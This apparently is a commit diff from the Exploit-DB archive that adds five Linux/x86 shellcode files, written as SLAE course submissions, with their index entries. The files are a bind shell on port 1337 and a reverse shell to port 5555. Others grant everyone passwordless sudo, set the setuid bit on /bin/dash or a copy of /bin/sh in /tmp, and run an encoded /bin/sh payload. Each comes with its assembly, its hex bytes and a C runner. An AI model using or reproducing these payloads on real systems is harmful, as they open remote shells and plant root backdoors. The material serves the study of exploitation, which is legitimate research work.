44507,shellcodes/linux_x86/44507.c,"Linux/x86 - Edit /etc/sudoers with NOPASSWD for ALL Shellcode",2018-04-24,absolomb,shellcode,linux_x86
44508,shellcodes/linux_x86/44508.c,"Linux/x86 - Reverse TCP (5555/TCP) Shellcode - (73 Bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86
44509,shellcodes/linux_x86/44509.c,"Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes)",2018-04-24,absolomb,shellcode,linux_x86
44510,shellcodes/linux_x86/44510.c,"Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh Shellcode (74 bytes)",2018-04-24,absolomb,shellcode,linux_x86
44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve /bin/sh Shellcode Encoded with ROT-13 + RShift-2 + XOR Encoded (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86

1 id file description date author type platform
874 44321 shellcodes/linux_x86/44321.c Linux/x86 - execve(/bin/sh) Shellcode (18 bytes) 2018-03-20 Anurag Srivastava shellcode linux_x86
875 44334 shellcodes/linux_x86/44334.c Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes) 2018-03-23 Anurag Srivastava shellcode linux_x86
876 44445 shellcodes/generator/44445.py Linux/x64 - x64 Assembly Shellcode (Generator) 2018-04-11 0x4ndr3 shellcode generator
877 44505 shellcodes/linux_x86/44505.c Linux/x86 - Bind TCP (1337/TCP) Shell + Null-Free Shellcode (92 bytes) 2018-04-24 Anurag Srivastava shellcode linux_x86
878 44507 shellcodes/linux_x86/44507.c Linux/x86 - Edit /etc/sudoers with NOPASSWD for ALL Shellcode 2018-04-24 absolomb shellcode linux_x86
879 44508 shellcodes/linux_x86/44508.c Linux/x86 - Reverse TCP (5555/TCP) Shellcode - (73 Bytes) 2018-04-24 Anurag Srivastava shellcode linux_x86
880 44509 shellcodes/linux_x86/44509.c Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes) 2018-04-24 absolomb shellcode linux_x86
881 44510 shellcodes/linux_x86/44510.c Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh Shellcode (74 bytes) 2018-04-24 absolomb shellcode linux_x86
882 44517 shellcodes/linux_x86/44517.c Linux/x86 - execve /bin/sh Shellcode Encoded with ROT-13 + RShift-2 + XOR Encoded (44 bytes) 2018-04-24 Nuno Freitas shellcode linux_x86

81
shellcodes/linux_x86/44505.c Normal file
View file

@ -0,0 +1,81 @@
/**
# Linux x86 Bind TCP shellcode
# This shellcode will listen on port 1337 and give you /bin/sh
# Shellcode Author: Anurag Srivastava
# Shellcode Length: 92
# Student-ID: SLAE-1219
# Note ~ http://www.theanuragsrivastava.in/2018/04/bind-tcp-shellcode-x86-slae-assignment.html
Disassembly of section .text:
08048060 <_start>:
8048060: 6a 66 push 0x66
8048062: 58 pop eax
8048063: 31 db xor ebx,ebx
8048065: 53 push ebx
8048066: 43 inc ebx
8048067: 53 push ebx
8048068: 6a 02 push 0x2
804806a: 89 e1 mov ecx,esp
804806c: 99 cdq
804806d: cd 80 int 0x80
804806f: 96 xchg esi,eax
8048070: 52 push edx
8048071: 66 68 05 39 pushw 0x3905
8048075: 43 inc ebx
8048076: 66 53 push bx
8048078: 89 e1 mov ecx,esp
804807a: 6a 10 push 0x10
804807c: 51 push ecx
804807d: 56 push esi
804807e: 89 e1 mov ecx,esp
8048080: 6a 66 push 0x66
8048082: 58 pop eax
8048083: cd 80 int 0x80
8048085: 53 push ebx
8048086: 6a 04 push 0x4
8048088: 5b pop ebx
8048089: 56 push esi
804808a: 89 e1 mov ecx,esp
804808c: 6a 66 push 0x66
804808e: 58 pop eax
804808f: cd 80 int 0x80
8048091: 52 push edx
8048092: 52 push edx
8048093: 56 push esi
8048094: 89 e1 mov ecx,esp
8048096: 43 inc ebx
8048097: 6a 66 push 0x66
8048099: 58 pop eax
804809a: cd 80 int 0x80
804809c: 93 xchg ebx,eax
804809d: 6a 02 push 0x2
804809f: 59 pop ecx
080480a0 <loop>:
80480a0: 6a 3f push 0x3f
80480a2: 58 pop eax
80480a3: cd 80 int 0x80
80480a5: 49 dec ecx
80480a6: 79 f8 jns 80480a0 <loop>
80480a8: 31 c9 xor ecx,ecx
80480aa: 51 push ecx
80480ab: 6a 0b push 0xb
80480ad: 58 pop eax
80480ae: 68 2f 2f 73 68 push 0x68732f2f
80480b3: 68 2f 62 69 6e push 0x6e69622f
80480b8: 89 e3 mov ebx,esp
80480ba: cd 80 int 0x80
**/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x6a\x66\x58\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\x99\xcd\x80\x96\x52\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x53\x6a\x04\x5b\x56\x89\xe1\x6a\x66\x58\xcd\x80\x52\x52\x56\x89\xe1\x43\x6a\x66\x58\xcd\x80\x93\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc9\x51\x6a\x0b\x58\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

71
shellcodes/linux_x86/44507.c Normal file
View file

@ -0,0 +1,71 @@
/*
Title: Edit /etc/sudoers with NOPASSWD for ALL
Date: 2018-04-19
Author: absolomb
Website: https://www.sploitspren.com
SLAE-ID: 1208
Purpose: edit /etc/sudoers with ALL ALL=(ALL) NOPASSWD: ALL
Tested On: Ubuntu 14.04
Arch: x86
Size: 79 bytes
Shellcode is register independent and null free.
global _start
section .text
_start:
xor edx, edx ; clear edx
xor ecx, ecx ; clear ecx
push edx ; terminating NULL
push 0x7372656f ; "sreo"
push 0x6475732f ; "dus/"
push 0x6374652f ; "cte/"
mov ebx, esp ; point ebx to stack
inc ecx ; ecx to 1
mov ch, 0x4 ; ecx to 401 O_WRONLY | O_APPEND
push 0x5 ; open()
pop eax
int 0x80 ; execute open
xchg ebx, eax ; save fd in ebx
jmp short setup
;write(fd, ALL ALL=(ALL) NOPASSWD: ALL\n, len);
write:
pop ecx ; pop "ALL ALL=(ALL) NOPASSWD: ALL"
mov dl, 0x1c ; len 28
push 0x4 ; write()
pop eax
int 0x80 ; execute write
push 0x1 ; exit ()
pop eax
int 0x80
setup:
call write
db "ALL ALL=(ALL) NOPASSWD: ALL" , 0xa
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xd2\x31\xc9\x52\x68\x6f\x65\x72\x73\x68\x2f\x73\x75\x64\x68\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\x6a\x05\x58\xcd\x80\x93\xeb\x0d\x59\xb2\x1c\x6a\x04\x58\xcd\x80\x6a\x01\x58\xcd\x80\xe8\xee\xff\xff\xff\x41\x4c\x4c\x20\x41\x4c\x4c\x3d\x28\x41\x4c\x4c\x29\x20\x4e\x4f\x50\x41\x53\x53\x57\x44\x3a\x20\x41\x4c\x4c\x0a";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

68
shellcodes/linux_x86/44508.c Normal file
View file

@ -0,0 +1,68 @@
/**
# Linux x86 Reverse TCP shellcode
# 127.1.1.1/5555
# Shellcode Author: Anurag Srivastava
# Shellcode Length: 73
# Student-ID: SLAE-1219
# Note ~ http://www.theanuragsrivastava.in/2018/04/reverse-tcp-shellcode-x86-slae.html
reverse: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 6a 66 push 0x66
8048062: 58 pop eax
8048063: 31 db xor ebx,ebx
8048065: 53 push ebx
8048066: 43 inc ebx
8048067: 53 push ebx
8048068: 6a 02 push 0x2
804806a: 89 e1 mov ecx,esp
804806c: 99 cdq
804806d: cd 80 int 0x80
804806f: 93 xchg ebx,eax
8048070: 59 pop ecx
08048071 <loop>:
8048071: 6a 3f push 0x3f
8048073: 58 pop eax
8048074: cd 80 int 0x80
8048076: 49 dec ecx
8048077: 79 f8 jns 8048071 <loop>
8048079: 68 7f 01 01 01 push 0x101017f
804807e: 66 68 15 b3 pushw 0xb315
8048082: 66 6a 02 pushw 0x2
8048085: 89 e1 mov ecx,esp
8048087: 6a 10 push 0x10
8048089: 51 push ecx
804808a: 53 push ebx
804808b: 89 e1 mov ecx,esp
804808d: 6a 66 push 0x66
804808f: 58 pop eax
8048090: 6a 03 push 0x3
8048092: 5b pop ebx
8048093: cd 80 int 0x80
8048095: 31 c9 xor ecx,ecx
8048097: 51 push ecx
8048098: 6a 0b push 0xb
804809a: 58 pop eax
804809b: 68 2f 2f 73 68 push 0x68732f2f
80480a0: 68 2f 62 69 6e push 0x6e69622f
80480a5: 89 e3 mov ebx,esp
80480a7: cd 80 int 0x80
**/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x6a\x66\x58\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\x99\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x7f\x01\x01\x01\x66\x68\x15\xb3\x66\x6a\x02\x89\xe1\x6a\x10\x51\x53\x89\xe1\x6a\x66\x58\x6a\x03\x5b\xcd\x80\x31\xc9\x51\x6a\x0b\x58\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

47
shellcodes/linux_x86/44509.c Normal file
View file

@ -0,0 +1,47 @@
/*
Title: chmod 4755 /bin/dash
Author: absolomb
Website: https://www.sploitspren.com
SLAE-ID: 1208
Purpose: setuid bit on /bin/dash
Tested On: Ubuntu 14.04
Arch: x86
Size: 33 bytes
global _start
section .text
_start:
cdq ; edx to 0
push edx ; terminating NULL
push 0x68736164 ; 'hsad'
push 0x2f6e6962 ; '/nib'
push 0x2f2f2f2f ; '////'
mov ebx, esp ; point ebx to stack
mov cx, 0x9ed ; 4755
push 0xf ; chmod()
pop eax
int 0x80 ; execute chmod()
push 0x1 ; exit()
pop eax
int 0x80 ; execute exit()
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x99\x52\x68\x64\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x66\xb9\xed\x09\x6a\x0f\x58\xcd\x80\x6a\x01\x58\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

60
shellcodes/linux_x86/44510.c Normal file
View file

@ -0,0 +1,60 @@
/*
Title: Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh
Author: absolomb
Website: https://www.sploitspren.com
SLAE-ID: 1208
Purpose: cp shell into /tmp and setuid
Tested On: Ubuntu 14.04
Arch: x86
Size: 74 bytes
Shellcode is register independent and null free.
global _start
section .text
_start:
push 0xb ; execve()
pop eax ;
cdq ; set edx to 0
push edx ; NULL
push word 0x632d ; "c-"
mov edi,esp ; point edi to stack
push edx ; NULL
push 0x68732f2f ; "hs//"
push 0x6e69622f ; "/bin"
mov ebx,esp ; point ebx to stack
push edx ; NULL
jmp short cmd
execute:
push edi ; "c-"
push ebx ; "/bin/sh"
mov ecx,esp ; point to stack
int 0x80 ; execute execve
cmd:
call execute
db "cp /bin/sh /tmp/sh; chmod +s /tmp/sh"
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\xeb\x06\x57\x53\x89\xe1\xcd\x80\xe8\xf5\xff\xff\xff\x63\x70\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2f\x74\x6d\x70\x2f\x73\x68\x3b\x20\x63\x68\x6d\x6f\x64\x20\x2b\x73\x20\x2f\x74\x6d\x70\x2f\x73\x68";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

54
shellcodes/linux_x86/44517.c Normal file
View file

@ -0,0 +1,54 @@
/*
; Title : Execve /bin/sh Shellcode encoded with ROT-13 + RShift-2 + XOR
; Date : April, 2018
; Author : Nuno Freitas
; Blog Post : https://bufferoverflowed.wordpress.com/slae32/slae-32-shellcode-encoder/
; Twitter : @nunof11
; SLAE ID : SLAE-1112
; Size : 44 bytes
; Tested on : i686 GNU/Linux
NASM:
section .text
global _start
_start:
jmp short call_decoder
decoder:
pop esi ; pop the Shellcode address from the Stack
xor ecx, ecx
mov cl, shellcodelen ; Set the loop counter to shellcodelen
decode:
rol byte [esi], 0x2 ; Left Shift 2
xor byte [esi], cl ; XOR the byte with the ecx (counter)
sub byte [esi], 13 ; Undo ROT13
inc esi ; increment the offset (iterate over the bytes)
loop decode ; loop while zero flag not set
jmp short Shellcode
call_decoder:
call decoder ; Shellcode address will be pushed into the Stack
Shellcode: db 0x4b,0xf7,0x13,0x59,0xcc,0x8c,0x63,0x5e,0x9f,0x8d,0x99,0x9f,0x1f,0xa4,0x3b,0x6e,0xc6,0x36,0x23
shellcodelen equ $-Shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\xeb\x12\x5e\x31\xc9\xb1\x13\xc0\x06\x02\x30\x0e\x80\x2e\x0d\x46\xe2\xf5\xeb\x05\xe8\xe9\xff\xff\xff\x4b\xf7\x13\x59\xcc\x8c\x63\x5e\x9f\x8d\x99\x9f\x1f\xa4\x3b\x6e\xc6\x36\x23";
void main()
{
printf("Shellcode Length: %d\n", strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
}